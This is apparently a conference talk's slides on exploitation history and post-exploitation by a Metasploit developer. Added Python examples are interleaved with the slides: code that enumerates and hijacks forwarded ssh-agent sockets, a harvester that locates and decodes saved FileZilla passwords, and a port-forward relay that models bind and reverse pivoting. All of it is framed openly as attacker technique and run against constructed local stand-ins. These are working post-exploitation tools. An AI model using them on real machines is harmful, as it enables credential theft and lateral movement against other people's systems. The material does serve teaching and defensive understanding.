You’re Already 0wned James Lee

Think Like an Attacker

# whoami

@egyp7
Metasploit developer
Attacker
Erstwhile:
  reverse engineer
  vuln researcher
  penetration tester

A Brief History of Exploitation

Golden Era (up to mid-late 1990s)
Silver Era (mid-late 1990s to mid 2000s)
Modern Era (late 2000s to now)

Golden Era

Centralized Computing
Universities, Research Orgs

Golden Era Exploitation

Passwords
War dialing
Whistling into phones
Launching ICBMs
Configuration errors

Silver Era (mid 1990s)

Practical portable systems
Rise of WiFi
Much greater use of technical mitigation

Silver Era Exploitation

Passwords
The rise of client-sides
The rise of web exploitation

The Age of Worms

Email Worms

ILOVEYOU
Sircam
Sobig
MyDoom

Server-side Worms

Vector                              Worm
ms00-078 IIS, Solaris sadmind       Sadmind
ms01-033 IIS                        Code Red
(big list of vectors)               Nimda
ms02-039 SQL Server                 Slammer
ms03-026 DCOM                       Blaster
ms04-011 LSASS                      Sasser
ms05-039                            Zotob
ms08-067                            Conficker

Modern Era

The web is the Internet
Ubiquitous mobile computing
Secure Development Lifecycle (SDLC)

An exploit converts illegitimate access into legitimate access

Converting Access

Web applications
Phishing
App servers, legit admin stuff

Trust relationships

Single Sign On
Kerberos
SSH keys, ssh-agent
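The ssh-agent bullet is the cleanest case of converting access through a trust relationship: a shell on a host where an admin logged in with agent forwarding gives you a socket that will sign SSH challenges with the admin's keys, no credential theft required. Below is an added Python example, not from the talk and not Metasploit code, that speaks enough of the OpenSSH agent protocol (SSH_AGENTC_REQUEST_IDENTITIES / SSH_AGENT_IDENTITIES_ANSWER) to list what a reachable agent would sign for. The socket glob is OpenSSH's usual Linux location; the fake agent and its single ed25519 key are constructed so the example runs offline.

```python
import base64
import glob
import hashlib
import os
import socket
import struct
import tempfile
import threading

SSH_AGENTC_REQUEST_IDENTITIES = 11   # client -> agent
SSH_AGENT_IDENTITIES_ANSWER = 12     # agent -> client


def find_agent_sockets():
    """Where OpenSSH drops agent sockets on Linux, including ones forwarded with ssh -A."""
    return sorted(glob.glob("/tmp/ssh-*/agent.*"))


def _string(data):
    """SSH wire 'string': uint32 big-endian length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def _read_string(buf, off):
    (n,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4:off + 4 + n], off + 4 + n


def _recv_exact(sock, n):
    out = b""
    while len(out) < n:
        chunk = sock.recv(n - len(out))
        if not chunk:
            raise ConnectionError("agent closed the socket early")
        out += chunk
    return out


def list_agent_keys(sock_path):
    """Return [(key_type, 'SHA256:...' fingerprint as ssh-add -l prints it, comment)]
    for every identity the agent at sock_path holds."""
    with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
        s.connect(sock_path)
        body = bytes([SSH_AGENTC_REQUEST_IDENTITIES])          # request carries only its type byte
        s.sendall(struct.pack(">I", len(body)) + body)
        (length,) = struct.unpack(">I", _recv_exact(s, 4))
        reply = _recv_exact(s, length)
    if reply[0] != SSH_AGENT_IDENTITIES_ANSWER:
        raise ValueError("unexpected agent message type %d" % reply[0])
    (count,) = struct.unpack_from(">I", reply, 1)
    off, keys = 5, []
    for _ in range(count):
        blob, off = _read_string(reply, off)      # public key blob, same bytes as in authorized_keys
        comment, off = _read_string(reply, off)
        key_type, _ = _read_string(blob, 0)       # first string inside the blob names the algorithm
        fp = "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")
        keys.append((key_type.decode(), fp, comment.decode(errors="replace")))
    return keys


def fake_agent(keys):
    """Constructed stand-in for ssh-agent (assumption: only REQUEST_IDENTITIES is needed).
    Serves one IDENTITIES_ANSWER for keys=[(key_type, pubkey_bytes, comment)] and returns
    the socket path."""
    path = os.path.join(tempfile.mkdtemp(), "agent.sock")
    srv = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    srv.bind(path)
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            (length,) = struct.unpack(">I", _recv_exact(conn, 4))
            req = _recv_exact(conn, length)
            if req[0] == SSH_AGENTC_REQUEST_IDENTITIES:
                answer = bytes([SSH_AGENT_IDENTITIES_ANSWER]) + struct.pack(">I", len(keys))
                for key_type, pub, comment in keys:
                    answer += _string(_string(key_type) + _string(pub)) + _string(comment)
                conn.sendall(struct.pack(">I", len(answer)) + answer)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return path


def demo():
    """Scenario: an admin connected here with `ssh -A`; we found the forwarded socket and
    ask the agent what it holds. The key material below is constructed, not a real key."""
    path = fake_agent([(b"ssh-ed25519", b"\x01" * 32, b"admin@bastion")])
    return list_agent_keys(path)
```

On a real host you would point `list_agent_keys` at one of `find_agent_sockets()` (or `$SSH_AUTH_SOCK`) and then set `SSH_AUTH_SOCK` to that path before running `ssh`, which is the whole attack: the agent signs for anyone who can open its socket.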

The Three Ps

Post Exploitation

Presence

Demo: Steal all the Passwords

mimikatz

Demo: Steal all the Passwords

post/multi/gather/filezilla_client_cred
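The second demo makes the "legit admin stuff" point: a client like FileZilla stores saved-site credentials on disk, so a shell on an admin's workstation is a shell on every server they connect to. The following is an added Python example, not the Metasploit module's own code, that does what such a post module has to do: find `sitemanager.xml` (`%APPDATA%\FileZilla` on Windows, `~/.config/filezilla` elsewhere), parse each `<Server>` entry, and decode the password, which recent FileZilla versions store as `<Pass encoding="base64">` and older ones stored in the clear. The XML sample is constructed, and the numeric protocol-code map is an assumption about FileZilla's enum.

```python
import base64
import os
import xml.etree.ElementTree as ET

# Constructed sample shaped like FileZilla's sitemanager.xml; not a real file.
SAMPLE_SITEMANAGER = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.10.0">
  <Servers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>deploy</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Logontype>1</Logontype>
      <Name>prod web</Name>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>backup</User>
      <Pass>legacy-plain</Pass>
      <Logontype>1</Logontype>
      <Name>old box</Name>
    </Server>
    <Server>
      <Host>anon.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <Logontype>0</Logontype>
      <Name>anonymous mirror</Name>
    </Server>
  </Servers>
</FileZilla3>
"""

# Assumption: FileZilla's numeric Protocol codes (0 FTP, 1 SFTP, 3 implicit FTPS, 4 explicit FTPES).
PROTOCOLS = {"0": "ftp", "1": "sftp", "3": "ftps", "4": "ftpes"}


def sitemanager_paths():
    """Usual locations of the saved-sites file on Windows and on Linux/macOS."""
    candidates = []
    if os.environ.get("APPDATA"):
        candidates.append(os.path.join(os.environ["APPDATA"], "FileZilla", "sitemanager.xml"))
    candidates.append(os.path.expanduser("~/.config/filezilla/sitemanager.xml"))
    return candidates


def decode_password(pass_el):
    """Handle both storage forms; None when the entry has no password (anonymous / ask)."""
    if pass_el is None or not pass_el.text:
        return None
    if pass_el.get("encoding") == "base64":
        return base64.b64decode(pass_el.text).decode("utf-8", "replace")
    return pass_el.text


def parse_sitemanager(xml_text):
    """Return one dict per saved site with the password recovered."""
    root = ET.fromstring(xml_text)
    sites = []
    for server in root.iterfind("./Servers/Server"):
        sites.append({
            "name": server.findtext("Name", ""),
            "host": server.findtext("Host", ""),
            "port": int(server.findtext("Port", "0") or 0),
            "protocol": PROTOCOLS.get(server.findtext("Protocol", ""), "unknown"),
            "user": server.findtext("User", ""),
            "password": decode_password(server.find("Pass")),
        })
    return sites


def gather(paths=None):
    """Read whichever sitemanager.xml exists and return its sites (empty list if none)."""
    for path in paths or sitemanager_paths():
        if os.path.isfile(path):
            with open(path, encoding="utf-8") as fh:
                return parse_sitemanager(fh.read())
    return []
```

Base64 is an encoding, not protection; the only thing that makes these credentials hard to reach is the filesystem ACL on the profile directory, which a shell as that user already satisfies.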

Persistence

Pivoting

Pivoting

Two* methods in Metasploit
  ● Route
  ● Portfwd

* Mostly

[Diagram: exploit and payload across a pivot, with a bind payload]

[Diagram: exploit and payload across a pivot, with a reverse payload]

Demo: Reverse Pivoting

[Diagram: exploit and payload across a pivot]

Demo: Bind Pivoting
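The two Metasploit methods differ in who the relay is transparent to: `route add` sends the framework's own traffic for a subnet down an existing session, so any module can target hosts behind the pivot, while `portfwd` opens a listener that relays each connection to one host:port behind the pivot, which is what tools outside Metasploit need. The bind and reverse pivoting demos above differ only in which side initiates through that relay: with a bind payload the attacker connects through the pivot to a listener on the target, with a reverse payload the target connects through the pivot back to the attacker's handler. Below is an added Python model of the portfwd relay, not Metasploit's code and not from the talk; the two services it relays to are constructed stand-ins for a listening payload and for an attacker-side handler, and everything runs on 127.0.0.1 with OS-assigned ports.

```python
import socket
import threading


def _pump(src, dst):
    """Copy bytes src -> dst until src hits EOF, then half-close dst so EOF propagates."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


class PortForward:
    """Model of `portfwd add -l LPORT -r RHOST -p RPORT`: every connection accepted on
    the listener is relayed to `target`, so the connecting side never talks to it directly."""

    def __init__(self, target, listen_host="127.0.0.1", listen_port=0):
        self.target = target
        self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.server.bind((listen_host, listen_port))   # port 0: let the OS pick a free port
        self.server.listen(8)
        self.listen_addr = self.server.getsockname()
        threading.Thread(target=self._accept_loop, daemon=True).start()

    def _accept_loop(self):
        while True:
            try:
                client, _ = self.server.accept()
            except OSError:                               # listener was closed
                return
            try:
                upstream = socket.create_connection(self.target, timeout=5)
            except OSError:                               # far side unreachable: drop the client
                client.close()
                continue
            threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
            threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()

    def close(self):
        self.server.close()


def serve_once(handler):
    """Constructed stand-in for whatever sits at the far end: answer one connection
    with handler(request_bytes) -> response_bytes. Returns the (host, port) it listens on."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def run():
        conn, _ = srv.accept()
        with conn:
            conn.sendall(handler(conn.recv(4096)))
        srv.close()

    threading.Thread(target=run, daemon=True).start()
    return srv.getsockname()


def _talk(addr, payload):
    """Connect to addr, send payload, half-close, and collect the reply until EOF."""
    with socket.create_connection(addr, timeout=5) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def bind_pivot():
    """Bind pivoting: the payload on the internal host listens; the attacker reaches it
    by connecting to the pivot's forwarded port."""
    internal_listener = serve_once(lambda req: b"listening payload got: " + req)
    pivot = PortForward(target=internal_listener)
    try:
        return _talk(pivot.listen_addr, b"id\n")
    finally:
        pivot.close()


def reverse_pivot():
    """Reverse pivoting: the attacker's handler listens; the internal host connects to
    the pivot, which relays it back to the handler."""
    handler = serve_once(lambda req: b"handler got: " + req)
    pivot = PortForward(target=handler)
    try:
        return _talk(pivot.listen_addr, b"stage-request")
    finally:
        pivot.close()
```

The relay is the same in both cases; what changes is which endpoint had to be reachable first, which is why a reverse payload through a pivot needs the pivot host to expose a listener the target can reach, and a bind payload needs the target's listener to be reachable from the pivot.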

Modern Era Exploitation...

Very much like old school exploitation

Questions?

@[email protected]